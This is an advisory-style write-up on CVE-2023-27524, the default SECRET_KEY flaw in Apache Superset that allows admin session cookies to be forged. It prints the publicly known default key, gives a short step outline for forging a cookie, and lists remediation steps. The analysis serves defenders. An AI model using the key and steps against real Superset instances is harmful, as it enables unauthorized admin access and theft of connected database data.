CVE-2023-27524

What is Apache Superset?

Apache Superset is an open-source business intelligence and data visualization platform originally developed at Airbnb and donated to the Apache Software Foundation. Organizations use it to create dashboards, explore datasets from SQL databases and data warehouses, and share analytics across teams. Superset is deployed both as a self-hosted application and as a managed service. Because Superset directly connects to internal databases and data warehouses — often containing sensitive financial, operational, or customer data — an attacker who achieves admin access to Superset can read and exfiltrate database contents, modify dashboard configurations, and potentially pivot to connected data infrastructure.

Overview

CVE-2023-27524 is an insecure default initialization vulnerability (CWE-1188) in Apache Superset: installations that use the default SECRET_KEY value shipped with the application are vulnerable to session cookie forgery, allowing an unauthenticated attacker to fabricate a valid admin session cookie and access the Superset instance as an administrator. Horizon3.ai researchers discovered approximately 3,000 internet-exposed Superset instances with the default key unchanged. Apache patched the issue in Superset 2.1.0 by raising a startup error if the default key is detected. CISA added CVE-2023-27524 to the KEV catalog in January 2024, nearly nine months after public disclosure.

Affected Versions

Note: the vulnerability is not a code defect in a specific version — it affects any version where the operator has not changed SECRET_KEY from the default value documented in Superset's configuration. Upgrading to 2.1.0 helps by refusing to start with the default key, but older versions remain vulnerable until operators change the key.

Technical Details

Apache Superset is built on Flask, a Python web framework. Flask uses a SECRET_KEY to cryptographically sign session cookies using HMAC (Hash-based Message Authentication Code). When a user authenticates, Flask encodes their session data into a signed cookie; on subsequent requests, Flask verifies the signature to trust the session. If the SECRET_KEY is known to an attacker, they can forge a cookie that Flask accepts as legitimate — without ever presenting valid credentials.

Superset's default configuration (documented in superset_config.py) shipped with the following well-known test key:

SECRET_KEY = '\2\1thisismyscretkey\1\2\e\y\y\h'

This key is publicly visible in Superset's source code and documentation. Any Superset deployment that did not override this value in its production configuration uses a key that any attacker can look up.

Exploitation requires:

1. Identifying a Superset instance (Shodan, internet scanning)
2. Crafting a Flask session cookie signed with the default key, claiming administrator identity
3. Sending the forged cookie to the Superset instance — the server accepts it as a valid admin session

Once authenticated as admin, the attacker can read database connection credentials (stored in Superset for connecting to data warehouses), query connected databases directly through Superset's SQL Lab feature, and access all dashboards and underlying data.

The CVSS S:C (scope changed) reflects that a successful attack affects systems beyond Superset itself — connected databases and data warehouses can be directly queried and exfiltrated.

Discovery

Horizon3.ai security researchers identified the default SECRET_KEY issue and published their findings in April 2023. Their internet scan discovered approximately 3,000 Superset instances accessible from the public internet with the default key unchanged — representing a large pool of immediately compromisable administrative interfaces. The Apache Software Foundation coordinated disclosure and released the fix in Superset 2.1.0.

Exploitation Context

Insecure defaults in business intelligence and analytics platforms are particularly high-value because BI tools are specifically designed to aggregate and present sensitive data from across an organization's data infrastructure. An attacker who gains admin access to Superset immediately has a query interface into every database Superset is connected to — often including data warehouses, operational databases, and financial systems. The nine-month gap between April 2023 disclosure and January 2024 KEV addition suggests that exploitation was confirmed through incident response investigations, likely targeting Superset deployments in enterprise environments.

Remediation

1. Change the SECRET_KEY immediately — generate a strong random value (e.g., openssl rand -base64 42) and set it in your Superset configuration before restarting. All existing sessions will be invalidated, requiring users to log in again.
2. Upgrade to Apache Superset 2.1.0 or later — the startup check refuses to launch with the default key, preventing future misconfiguration.
3. Audit Superset access logs for unexpected admin logins — forged session cookies will appear in access logs as authenticated requests; review for logins from unexpected IP addresses or at unexpected times.
4. Restrict Superset to internal networks — Superset admin interfaces should not be accessible from the internet; place them behind a VPN or internal-only network boundary.
5. Review database connection credentials stored in Superset — if the default key was in use, assume attackers may have exfiltrated stored credentials and rotate database passwords for all connected data sources.
6. Audit connected database activity for unexpected queries originating from the Superset service account during the exposure window.